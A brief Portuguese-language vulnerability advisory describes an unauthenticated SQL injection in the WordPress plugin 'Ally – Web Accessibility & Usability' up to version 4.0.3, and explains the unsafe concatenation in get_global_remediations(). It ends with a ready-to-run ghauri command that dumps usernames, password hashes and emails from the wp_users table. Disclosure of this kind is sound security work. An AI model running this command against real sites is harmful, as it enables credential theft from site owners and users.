
Ally – Acessibilidade e Usabilidade Web <= 4.0.3 - Injeção SQL não autenticada via caminho de URL
Ally – Web Accessibility & Usability <= 4.0.3 - Injeção SQL não autenticada via caminho de URL
O plugin Ally – Web Accessibility & Usability para WordPress é vulnerável a Injeção SQL via caminho de URL em todas as versões até, e incluindo, a 4.0.3. Isso se deve ao escape insuficiente no parâmetro de URL fornecido pelo usuário no método get_global_remediations(), onde ele é diretamente concatenado em uma cláusula SQL JOIN sem a devida sanitização para o contexto SQL. Embora esc_url_raw() seja aplicado para a segurança da URL, ele não impede que metacaracteres SQL (aspas simples, parênteses) sejam injetados. Isso torna possível que atacantes não autenticados anexem consultas SQL adicionais a consultas já existentes, que podem ser usadas para extrair informações confidenciais do banco de dados por meio de técnicas de injeção SQL cega baseada em tempo. O módulo de Remediação deve estar ativo, o que exige que o plugin esteja conectado a uma conta Elementor.
ghauri -u "http://localhost:9001/x*" --technique=E --dbms=mysql --batch --ignore-code 404 --skip-urlencode --prefix="'" --suffix="OR'" -D wordpress -T wp_users -C user_login,user_pass,user_email --dump